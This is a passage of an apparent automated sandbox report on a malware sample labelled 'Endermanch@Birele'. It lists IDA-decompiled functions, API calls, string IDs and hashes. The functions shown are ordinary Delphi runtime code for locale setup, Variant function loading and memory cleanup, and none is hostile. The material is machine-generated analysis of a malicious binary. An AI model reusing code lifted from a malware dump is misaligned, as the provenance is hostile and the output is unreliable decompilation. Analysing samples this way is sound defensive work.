                                                                                                                                                  0x0040c58f

                                                                                                                                                  APIs
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040DC82,00000000,0040DE9B,?,?,00000000,00000000), ref: 0040C57B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                  • Opcode ID: 2e073c2160cb2ef527fe9edc8b84b13da2276b747e0507acb7b09c33265cf4bd
                                                                                                                                                  • Instruction ID: a9bc703ae7e4bd91a4003b8fe53232cbf41663b377f0762b65b213ba23526b64
                                                                                                                                                  • Opcode Fuzzy Hash: 2e073c2160cb2ef527fe9edc8b84b13da2276b747e0507acb7b09c33265cf4bd
                                                                                                                                                  • Instruction Fuzzy Hash: EDD05E6A30D260BAE210526B2DC5DBB5A9CCAC97A0F14457BFA48E7241D224CC0AA3B5
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040B01C() {
                                                                                                                                                  				struct _SYSTEMTIME* _t2;
                                                                                                                                                  
                                                                                                                                                  				GetLocalTime(_t2);
                                                                                                                                                  				return _t2->wYear;
                                                                                                                                                  			}




                                                                                                                                                  0x0040b020
                                                                                                                                                  0x0040b02c

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 481472006-0
                                                                                                                                                  • Opcode ID: b20e7c9d5e9c48645a5c0da3b96c1700b113354ae64b7070f0cc6086f7b5f333
                                                                                                                                                  • Instruction ID: 84afcb165929982d7b0753d5371d44f7b89c2bc9b48ea3d425a5c671a4e8af1a
                                                                                                                                                  • Opcode Fuzzy Hash: b20e7c9d5e9c48645a5c0da3b96c1700b113354ae64b7070f0cc6086f7b5f333
                                                                                                                                                  • Instruction Fuzzy Hash: A9A0120C404C0142C14033180C0315930449801620FD4075468BC213D1EA2D0120469B
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040EE20() {
                                                                                                                                                  				struct HINSTANCE__* _v8;
                                                                                                                                                  				intOrPtr _t46;
                                                                                                                                                  				void* _t91;
                                                                                                                                                  
                                                                                                                                                  				_v8 = GetModuleHandleA("oleaut32.dll");
                                                                                                                                                  				 *0x419a28 = E0040EDF4("VariantChangeTypeEx", E0040E990, _t91);
                                                                                                                                                  				 *0x419a2c = E0040EDF4("VarNeg", E0040E9C0, _t91);
                                                                                                                                                  				 *0x419a30 = E0040EDF4("VarNot", E0040E9C0, _t91);
                                                                                                                                                  				 *0x419a34 = E0040EDF4("VarAdd", E0040E9CC, _t91);
                                                                                                                                                  				 *0x419a38 = E0040EDF4("VarSub", E0040E9CC, _t91);
                                                                                                                                                  				 *0x419a3c = E0040EDF4("VarMul", E0040E9CC, _t91);
                                                                                                                                                  				 *0x419a40 = E0040EDF4("VarDiv", E0040E9CC, _t91);
                                                                                                                                                  				 *0x419a44 = E0040EDF4("VarIdiv", E0040E9CC, _t91);
                                                                                                                                                  				 *0x419a48 = E0040EDF4("VarMod", E0040E9CC, _t91);
                                                                                                                                                  				 *0x419a4c = E0040EDF4("VarAnd", E0040E9CC, _t91);
                                                                                                                                                  				 *0x419a50 = E0040EDF4("VarOr", E0040E9CC, _t91);
                                                                                                                                                  				 *0x419a54 = E0040EDF4("VarXor", E0040E9CC, _t91);
                                                                                                                                                  				 *0x419a58 = E0040EDF4("VarCmp", E0040E9D8, _t91);
                                                                                                                                                  				 *0x419a5c = E0040EDF4("VarI4FromStr", E0040E9E4, _t91);
                                                                                                                                                  				 *0x419a60 = E0040EDF4("VarR4FromStr", E0040EA50, _t91);
                                                                                                                                                  				 *0x419a64 = E0040EDF4("VarR8FromStr", E0040EABC, _t91);
                                                                                                                                                  				 *0x419a68 = E0040EDF4("VarDateFromStr", E0040EB28, _t91);
                                                                                                                                                  				 *0x419a6c = E0040EDF4("VarCyFromStr", E0040EB94, _t91);
                                                                                                                                                  				 *0x419a70 = E0040EDF4("VarBoolFromStr", E0040EC00, _t91);
                                                                                                                                                  				 *0x419a74 = E0040EDF4("VarBstrFromCy", E0040EC80, _t91);
                                                                                                                                                  				 *0x419a78 = E0040EDF4("VarBstrFromDate", E0040ECF0, _t91);
                                                                                                                                                  				_t46 = E0040EDF4("VarBstrFromBool", E0040ED60, _t91);
                                                                                                                                                  				 *0x419a7c = _t46;
                                                                                                                                                  				return _t46;
                                                                                                                                                  			}






                                                                                                                                                  0x0040ee2e
                                                                                                                                                  0x0040ee42
                                                                                                                                                  0x0040ee58
                                                                                                                                                  0x0040ee6e
                                                                                                                                                  0x0040ee84
                                                                                                                                                  0x0040ee9a
                                                                                                                                                  0x0040eeb0
                                                                                                                                                  0x0040eec6
                                                                                                                                                  0x0040eedc
                                                                                                                                                  0x0040eef2
                                                                                                                                                  0x0040ef08
                                                                                                                                                  0x0040ef1e
                                                                                                                                                  0x0040ef34
                                                                                                                                                  0x0040ef4a
                                                                                                                                                  0x0040ef60
                                                                                                                                                  0x0040ef76
                                                                                                                                                  0x0040ef8c
                                                                                                                                                  0x0040efa2
                                                                                                                                                  0x0040efb8
                                                                                                                                                  0x0040efce
                                                                                                                                                  0x0040efe4
                                                                                                                                                  0x0040effa
                                                                                                                                                  0x0040f00a
                                                                                                                                                  0x0040f010
                                                                                                                                                  0x0040f017

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040EE29
                                                                                                                                                    • Part of subcall function 0040EDF4: GetProcAddress.KERNEL32(00000000), ref: 0040EE0D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                                                                  • Opcode ID: bdb40698b34ec6225ffea47ce212872b8a7fbbc49a5a346c06efc2bc322458bf
                                                                                                                                                  • Instruction ID: 7de6bee41019896d0760bafea1200351b5f43c55b3df178a4c1e32df0fe6ca09
                                                                                                                                                  • Opcode Fuzzy Hash: bdb40698b34ec6225ffea47ce212872b8a7fbbc49a5a346c06efc2bc322458bf
                                                                                                                                                  • Instruction Fuzzy Hash: 984128B16042559BE314AB6FB80146777DADA44710364C83BF414FBEC2DF38AC699A2E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                  			E00401A3C() {
                                                                                                                                                  				void* _t2;
                                                                                                                                                  				void* _t3;
                                                                                                                                                  				void* _t14;
                                                                                                                                                  				intOrPtr* _t19;
                                                                                                                                                  				intOrPtr _t23;
                                                                                                                                                  				intOrPtr _t26;
                                                                                                                                                  				intOrPtr _t28;
                                                                                                                                                  
                                                                                                                                                  				_t26 = _t28;
                                                                                                                                                  				if( *0x4195bc == 0) {
                                                                                                                                                  					return _t2;
                                                                                                                                                  				} else {
                                                                                                                                                  					_push(_t26);
                                                                                                                                                  					_push(E00401B12);
                                                                                                                                                  					_push( *[fs:edx]);
                                                                                                                                                  					 *[fs:edx] = _t28;
                                                                                                                                                  					if( *0x419045 != 0) {
                                                                                                                                                  						_push(0x4195c4);
                                                                                                                                                  						L004012D4();
                                                                                                                                                  					}
                                                                                                                                                  					 *0x4195bc = 0;
                                                                                                                                                  					_t3 =  *0x41961c; // 0x641848
                                                                                                                                                  					LocalFree(_t3);
                                                                                                                                                  					 *0x41961c = 0;
                                                                                                                                                  					_t19 =  *0x4195e4; // 0x642e7c
                                                                                                                                                  					while(_t19 != 0x4195e4) {
                                                                                                                                                  						VirtualFree( *(_t19 + 8), 0, 0x8000);
                                                                                                                                                  						_t19 =  *_t19;
                                                                                                                                                  					}
                                                                                                                                                  					E0040133C(0x4195e4);
                                                                                                                                                  					E0040133C(0x4195f4);
                                                                                                                                                  					E0040133C(0x419620);
                                                                                                                                                  					_t14 =  *0x4195dc; // 0x642848
                                                                                                                                                  					while(_t14 != 0) {
                                                                                                                                                  						 *0x4195dc =  *_t14;
                                                                                                                                                  						LocalFree(_t14);
                                                                                                                                                  						_t14 =  *0x4195dc; // 0x642848
                                                                                                                                                  					}
                                                                                                                                                  					_pop(_t23);
                                                                                                                                                  					 *[fs:eax] = _t23;
                                                                                                                                                  					_push(0x401b19);
                                                                                                                                                  					if( *0x419045 != 0) {
                                                                                                                                                  						_push(0x4195c4);
                                                                                                                                                  						L004012DC();
                                                                                                                                                  					}
                                                                                                                                                  					_push(0x4195c4);
                                                                                                                                                  					L004012E4();
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  			}










                                                                                                                                                  0x00401a3d
                                                                                                                                                  0x00401a47
                                                                                                                                                  0x00401b1b
                                                                                                                                                  0x00401a4d
                                                                                                                                                  0x00401a4f
                                                                                                                                                  0x00401a50
                                                                                                                                                  0x00401a55
                                                                                                                                                  0x00401a58
                                                                                                                                                  0x00401a62
                                                                                                                                                  0x00401a64
                                                                                                                                                  0x00401a69
                                                                                                                                                  0x00401a69
                                                                                                                                                  0x00401a6e
                                                                                                                                                  0x00401a75
                                                                                                                                                  0x00401a7b
                                                                                                                                                  0x00401a82
                                                                                                                                                  0x00401a87
                                                                                                                                                  0x00401aa1
                                                                                                                                                  0x00401a9a
                                                                                                                                                  0x00401a9f
                                                                                                                                                  0x00401a9f
                                                                                                                                                  0x00401aae
                                                                                                                                                  0x00401ab8
                                                                                                                                                  0x00401ac2
                                                                                                                                                  0x00401ac7
                                                                                                                                                  0x00401ace
                                                                                                                                                  0x00401ad2
                                                                                                                                                  0x00401ad9
                                                                                                                                                  0x00401ade
                                                                                                                                                  0x00401ae3
                                                                                                                                                  0x00401ae9
                                                                                                                                                  0x00401aec
                                                                                                                                                  0x00401aef
                                                                                                                                                  0x00401afb
                                                                                                                                                  0x00401afd
                                                                                                                                                  0x00401b02
                                                                                                                                                  0x00401b02
                                                                                                                                                  0x00401b07
                                                                                                                                                  0x00401b0c
                                                                                                                                                  0x00401b11
                                                                                                                                                  0x00401b11

                                                                                                                                                  APIs
                                                                                                                                                  • RtlEnterCriticalSection.NTDLL(004195C4), ref: 00401A69
                                                                                                                                                  • LocalFree.KERNEL32(00641848,00000000,00401B12), ref: 00401A7B
                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00641848,00000000,00401B12), ref: 00401A9A
                                                                                                                                                  • LocalFree.KERNEL32(00642848,?,00000000,00008000,00641848,00000000,00401B12), ref: 00401AD9
                                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(004195C4), ref: 00401B02
                                                                                                                                                  • RtlDeleteCriticalSection.NTDLL(004195C4), ref: 00401B0C
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                  • String ID: H(d$\.d$l.d$|.d
                                                                                                                                                  • API String ID: 3782394904-2281952338
                                                                                                                                                  • Opcode ID: f0f8f0773a141528fc38170044d0b10cc1ae6e33993730db78a405c4b141d76b
                                                                                                                                                  • Instruction ID: 25698719bbe29fc3f7821338c9018e7429ddff27520ba8984f1b621353829f2e
                                                                                                                                                  • Opcode Fuzzy Hash: f0f8f0773a141528fc38170044d0b10cc1ae6e33993730db78a405c4b141d76b
                                                                                                                                                  • Instruction Fuzzy Hash: 2C114C75B046806EEB12AB66DCA1B967ADA9745B08F54807BE000B66F2C67D9C40CB2C
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 72%
                                                                                                                                                  			E0040DBD0(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                  				char _v8;
                                                                                                                                                  				char _v12;
                                                                                                                                                  				char _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				char _v24;
                                                                                                                                                  				char _v28;
                                                                                                                                                  				char _v32;
                                                                                                                                                  				char _v36;
                                                                                                                                                  				char _v40;
                                                                                                                                                  				char _v44;
                                                                                                                                                  				char _v48;
                                                                                                                                                  				char _v52;
                                                                                                                                                  				char _v56;
                                                                                                                                                  				char _v60;
                                                                                                                                                  				char _v64;
                                                                                                                                                  				char _v68;
                                                                                                                                                  				void* _t104;
                                                                                                                                                  				void* _t111;
                                                                                                                                                  				void* _t133;
                                                                                                                                                  				intOrPtr _t183;
                                                                                                                                                  				intOrPtr _t193;
                                                                                                                                                  				intOrPtr _t194;
                                                                                                                                                  
                                                                                                                                                  				_t191 = __esi;
                                                                                                                                                  				_t190 = __edi;
                                                                                                                                                  				_t193 = _t194;
                                                                                                                                                  				_t133 = 8;
                                                                                                                                                  				do {
                                                                                                                                                  					_push(0);
                                                                                                                                                  					_push(0);
                                                                                                                                                  					_t133 = _t133 - 1;
                                                                                                                                                  				} while (_t133 != 0);
                                                                                                                                                  				_push(__ebx);
                                                                                                                                                  				_push(_t193);
                                                                                                                                                  				_push(0x40de9b);
                                                                                                                                                  				_push( *[fs:eax]);
                                                                                                                                                  				 *[fs:eax] = _t194;
                                                                                                                                                  				E0040DA5C();
                                                                                                                                                  				E0040C5CC(__ebx, __edi, __esi);
                                                                                                                                                  				_t196 =  *0x4199d4;
                                                                                                                                                  				if( *0x4199d4 != 0) {
                                                                                                                                                  					E0040C7A4(__esi, _t196);
                                                                                                                                                  				}
                                                                                                                                                  				_t132 = GetThreadLocale();
                                                                                                                                                  				E0040C51C(_t43, 0, 0x14,  &_v20);
                                                                                                                                                  				E00403A00(0x419908, _v20);
                                                                                                                                                  				E0040C51C(_t43, 0x40deb0, 0x1b,  &_v24);
                                                                                                                                                  				 *0x41990c = E00409A90(0x40deb0, 0, _t196);
                                                                                                                                                  				E0040C51C(_t132, 0x40deb0, 0x1c,  &_v28);
                                                                                                                                                  				 *0x41990d = E00409A90(0x40deb0, 0, _t196);
                                                                                                                                                  				 *0x41990e = E0040C568(_t132, 0x2c, 0xf);
                                                                                                                                                  				 *0x41990f = E0040C568(_t132, 0x2e, 0xe);
                                                                                                                                                  				E0040C51C(_t132, 0x40deb0, 0x19,  &_v32);
                                                                                                                                                  				 *0x419910 = E00409A90(0x40deb0, 0, _t196);
                                                                                                                                                  				 *0x419911 = E0040C568(_t132, 0x2f, 0x1d);
                                                                                                                                                  				E0040C51C(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                                                                                                  				E0040C854(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                                                                                                  				E00403A00(0x419914, _v36);
                                                                                                                                                  				E0040C51C(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                                                                                                  				E0040C854(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                                                                                                  				E00403A00(0x419918, _v44);
                                                                                                                                                  				 *0x41991c = E0040C568(_t132, 0x3a, 0x1e);
                                                                                                                                                  				E0040C51C(_t132, 0x40dee4, 0x28,  &_v52);
                                                                                                                                                  				E00403A00(0x419920, _v52);
                                                                                                                                                  				E0040C51C(_t132, 0x40def0, 0x29,  &_v56);
                                                                                                                                                  				E00403A00(0x419924, _v56);
                                                                                                                                                  				E004039AC( &_v12);
                                                                                                                                                  				E004039AC( &_v16);
                                                                                                                                                  				E0040C51C(_t132, 0x40deb0, 0x25,  &_v60);
                                                                                                                                                  				_t104 = E00409A90(0x40deb0, 0, _t196);
                                                                                                                                                  				_t197 = _t104;
                                                                                                                                                  				if(_t104 != 0) {
                                                                                                                                                  					E00403A44( &_v8, 0x40df08);
                                                                                                                                                  				} else {
                                                                                                                                                  					E00403A44( &_v8, 0x40defc);
                                                                                                                                                  				}
                                                                                                                                                  				E0040C51C(_t132, 0x40deb0, 0x23,  &_v64);
                                                                                                                                                  				_t111 = E00409A90(0x40deb0, 0, _t197);
                                                                                                                                                  				_t198 = _t111;
                                                                                                                                                  				if(_t111 == 0) {
                                                                                                                                                  					E0040C51C(_t132, 0x40deb0, 0x1005,  &_v68);
                                                                                                                                                  					if(E00409A90(0x40deb0, 0, _t198) != 0) {
                                                                                                                                                  						E00403A44( &_v12, 0x40df24);
                                                                                                                                                  					} else {
                                                                                                                                                  						E00403A44( &_v16, 0x40df14);
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_push(_v12);
                                                                                                                                                  				_push(_v8);
                                                                                                                                                  				_push(":mm");
                                                                                                                                                  				_push(_v16);
                                                                                                                                                  				E00403D08();
                                                                                                                                                  				_push(_v12);
                                                                                                                                                  				_push(_v8);
                                                                                                                                                  				_push(":mm:ss");
                                                                                                                                                  				_push(_v16);
                                                                                                                                                  				E00403D08();
                                                                                                                                                  				 *0x4199d6 = E0040C568(_t132, 0x2c, 0xc);
                                                                                                                                                  				_pop(_t183);
                                                                                                                                                  				 *[fs:eax] = _t183;
                                                                                                                                                  				_push(E0040DEA2);
                                                                                                                                                  				return E004039D0( &_v68, 0x10);
                                                                                                                                                  			}

























                                                                                                                                                  0x0040dbd0
                                                                                                                                                  0x0040dbd0
                                                                                                                                                  0x0040dbd1
                                                                                                                                                  0x0040dbd3
                                                                                                                                                  0x0040dbd8
                                                                                                                                                  0x0040dbd8
                                                                                                                                                  0x0040dbda
                                                                                                                                                  0x0040dbdc
                                                                                                                                                  0x0040dbdc
                                                                                                                                                  0x0040dbdf
                                                                                                                                                  0x0040dbe2
                                                                                                                                                  0x0040dbe3
                                                                                                                                                  0x0040dbe8
                                                                                                                                                  0x0040dbeb
                                                                                                                                                  0x0040dbee
                                                                                                                                                  0x0040dbf3
                                                                                                                                                  0x0040dbf8
                                                                                                                                                  0x0040dbff
                                                                                                                                                  0x0040dc01
                                                                                                                                                  0x0040dc01
                                                                                                                                                  0x0040dc0b
                                                                                                                                                  0x0040dc1a
                                                                                                                                                  0x0040dc27
                                                                                                                                                  0x0040dc3c
                                                                                                                                                  0x0040dc4b
                                                                                                                                                  0x0040dc60
                                                                                                                                                  0x0040dc6f
                                                                                                                                                  0x0040dc82
                                                                                                                                                  0x0040dc95
                                                                                                                                                  0x0040dcaa
                                                                                                                                                  0x0040dcb9
                                                                                                                                                  0x0040dccc
                                                                                                                                                  0x0040dce1
                                                                                                                                                  0x0040dcec
                                                                                                                                                  0x0040dcf9
                                                                                                                                                  0x0040dd0e
                                                                                                                                                  0x0040dd19
                                                                                                                                                  0x0040dd26
                                                                                                                                                  0x0040dd39
                                                                                                                                                  0x0040dd4e
                                                                                                                                                  0x0040dd5b
                                                                                                                                                  0x0040dd70
                                                                                                                                                  0x0040dd7d
                                                                                                                                                  0x0040dd85
                                                                                                                                                  0x0040dd8d
                                                                                                                                                  0x0040dda2
                                                                                                                                                  0x0040ddac
                                                                                                                                                  0x0040ddb1
                                                                                                                                                  0x0040ddb3
                                                                                                                                                  0x0040ddcc
                                                                                                                                                  0x0040ddb5
                                                                                                                                                  0x0040ddbd
                                                                                                                                                  0x0040ddbd
                                                                                                                                                  0x0040dde1
                                                                                                                                                  0x0040ddeb
                                                                                                                                                  0x0040ddf0
                                                                                                                                                  0x0040ddf2
                                                                                                                                                  0x0040de04
                                                                                                                                                  0x0040de15
                                                                                                                                                  0x0040de2e
                                                                                                                                                  0x0040de17
                                                                                                                                                  0x0040de1f
                                                                                                                                                  0x0040de1f
                                                                                                                                                  0x0040de15
                                                                                                                                                  0x0040de33
                                                                                                                                                  0x0040de36
                                                                                                                                                  0x0040de39
                                                                                                                                                  0x0040de3e
                                                                                                                                                  0x0040de4b
                                                                                                                                                  0x0040de50
                                                                                                                                                  0x0040de53
                                                                                                                                                  0x0040de56
                                                                                                                                                  0x0040de5b
                                                                                                                                                  0x0040de68
                                                                                                                                                  0x0040de7b
                                                                                                                                                  0x0040de82
                                                                                                                                                  0x0040de85
                                                                                                                                                  0x0040de88
                                                                                                                                                  0x0040de9a

                                                                                                                                                  APIs
                                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,0040DE9B,?,?,00000000,00000000), ref: 0040DC06
                                                                                                                                                    • Part of subcall function 0040C51C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C53A
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.524454073.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.529879201.0000000000420000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.531764327.0000000000425000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_Endermanch@Birele.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                  • API String ID: 4232894706-2493093252
                                                                                                                                                  • Opcode ID: 62902babc501b0eecbf65fad29318be35f1785e17a9f9c06512933d40bf4854a
                                                                                                                                                  • Instruction ID: 5eb86ed3c9cb62c26540ef6b3a3db3d607a3633284b639398bbba6b49b036fa1
                                                                                                                                                  • Opcode Fuzzy Hash: 62902babc501b0eecbf65fad29318be35f1785e17a9f9c06512933d40bf4854a
                                                                                                                                                  • Instruction Fuzzy Hash: 37613F74B001499BDB00EBE5DC916DE76AA9B98304F14943BE101BB3C6CA3DED098B58
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                  			E0040FF8C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                  				char _v260;
                                                                                                                                                  				char _v768;
                                                                                                                                                  				char _v772;
                                                                                                                                                  				short* _v776;
                                                                                                                                                  				intOrPtr _v780;
                                                                                                                                                  				char _v784;
                                                                                                                                                  				signed int _v788;
                                                                                                                                                  				signed short* _v792;
                                                                                                                                                  				char _v796;
                                                                                                                                                  				char _v800;
                                                                                                                                                  				intOrPtr* _v804;
                                                                                                                                                  				void* __ebp;
                                                                                                                                                  				signed char _t47;
                                                                                                                                                  				signed int _t54;
                                                                                                                                                  				void* _t62;
                                                                                                                                                  				intOrPtr* _t73;
                                                                                                                                                  				intOrPtr* _t91;
                                                                                                                                                  				void* _t93;
                                                                                                                                                  				void* _t95;
                                                                                                                                                  				void* _t98;
                                                                                                                                                  				void* _t99;
                                                                                                                                                  				intOrPtr* _t108;
                                                                                                                                                  				void* _t112;
                                                                                                                                                  				intOrPtr _t113;
                                                                                                                                                  				char* _t114;
                                                                                                                                                  				void* _t115;
                                                                                                                                                  
                                                                                                                                                  				_t100 = __ecx;
                                                                                                                                                  				_v780 = __ecx;
                                                                                                                                                  				_t91 = __edx;
                                                                                                                                                  				_v776 = __eax;
                                                                                                                                                  				if(( *(__edx + 1) & 0x00000020) == 0) {
                                                                                                                                                  					E0040FBCC(0x80070057);
                                                                                                                                                  				}
                                                                                                                                                  				_t47 =  *_t91;
                                                                                                                                                  				if((_t47 & 0x00000fff) != 0xc) {
                                                                                                                                                  					_push(_t91);
                                                                                                                                                  					_push(_v776);
                                                                                                                                                  					L0040E980();
                                                                                                                                                  					return E0040FBCC(_v776);
                                                                                                                                                  				} else {
                                                                                                                                                  					if((_t47 & 0x00000040) == 0) {
                                                                                                                                                  						_v792 =  *((intOrPtr*)(_t91 + 8));
                                                                                                                                                  					} else {
                                                                                                                                                  						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                                                                                                                                                  					}
                                                                                                                                                  					_v788 =  *_v792 & 0x0000ffff;
                                                                                                                                                  					_t93 = _v788 - 1;
                                                                                                                                                  					if(_t93 < 0) {
                                                                                                                                                  						L9:
                                                                                                                                                  						_push( &_v772);
                                                                                                                                                  						_t54 = _v788;
                                                                                                                                                  						_push(_t54);
                                                                                                                                                  						_push(0xc);
                                                                                                                                                  						L0040EDD4();
                                                                                                                                                  						_t113 = _t54;
                                                                                                                                                  						if(_t113 == 0) {
                                                                                                                                                  							E0040F924(_t100);
                                                                                                                                                  						}
                                                                                                                                                  						E0040FEE4(_v776);
                                                                                                                                                  						 *_v776 = 0x200c;
                                                                                                                                                  						 *((intOrPtr*)(_v776 + 8)) = _t113;
                                                                                                                                                  						_t95 = _v788 - 1;
                                                                                                                                                  						if(_t95 < 0) {
                                                                                                                                                  							L14:
                                                                                                                                                  							_t97 = _v788 - 1;
                                                                                                                                                  							if(E0040FF00(_v788 - 1, _t115) != 0) {
                                                                                                                                                  								L0040EDEC();
                                                                                                                                                  								E0040FBCC(_v792);
                                                                                                                                                  								L0040EDEC();
                                                                                                                                                  								E0040FBCC( &_v260);
                                                                                                                                                  								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                                                                                                                                                  							}
                                                                                                                                                  							_t62 = E0040FF30(_t97, _t115);
                                                                                                                                                  						} else {
                                                                                                                                                  							_t98 = _t95 + 1;
                                                                                                                                                  							_t73 =  &_v768;
                                                                                                                                                  							_t108 =  &_v260;
                                                                                                                                                  							do {
                                                                                                                                                  								 *_t108 =  *_t73;
                                                                                                                                                  								_t108 = _t108 + 4;
                                                                                                                                                  								_t73 = _t73 + 8;
                                                                                                                                                  								_t98 = _t98 - 1;
                                                                                                                                                  							} while (_t98 != 0);
                                                                                                                                                  							do {
                                                                                                                                                  								goto L14;
                                                                                                                                                  							} while (_t62 != 0);
                                                                                                                                                  							return _t62;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						_t99 = _t93 + 1;
                                                                                                                                                  						_t112 = 0;
                                                                                                                                                  						_t114 =  &_v772;
                                                                                                                                                  						do {
                                                                                                                                                  							_v804 = _t114;
                                                                                                                                                  							_push(_v804 + 4);
                                                                                                                                                  							_t18 = _t112 + 1; // 0x1
                                                                                                                                                  							_push(_v792);
                                                                                                                                                  							L0040EDDC();
                                                                                                                                                  							E0040FBCC(_v792);
                                                                                                                                                  							_push( &_v784);
                                                                                                                                                  							_t21 = _t112 + 1; // 0x1
                                                                                                                                                  							_push(_v792);
                                                                                                                                                  							L0040EDE4();
                                                                                                                                                  							E0040FBCC(_v792);
                                                                                                                                                  							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                                                                                                                                                  							_t112 = _t112 + 1;
                                                                                                                                                  							_t114 = _t114 + 8;
                                                                                                                                                  							_t99 = _t99 - 1;
                                                                                                                                                  						} while (_t99 != 0);
                                                                                                                                                  						goto L9;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  			}





























                                                                                                                                                  0x0040ff8c
                                                                                                                                                  0x0040ff98
                                                                                                                                                  0x0040ff9e
                                                                                                                                                  0x0040ffa0
                                                                                                                                                  0x0040ffaa
                                                                                                                                                  0x0040ffb1
                                                                                                                                                  0x0040ffb1
                                                                                                                                                  0x0040ffb6
                                                                                                                                                  0x0040ffc4
                                                                                                                                                  0x0041013d
                                                                                                                                                  0x00410144
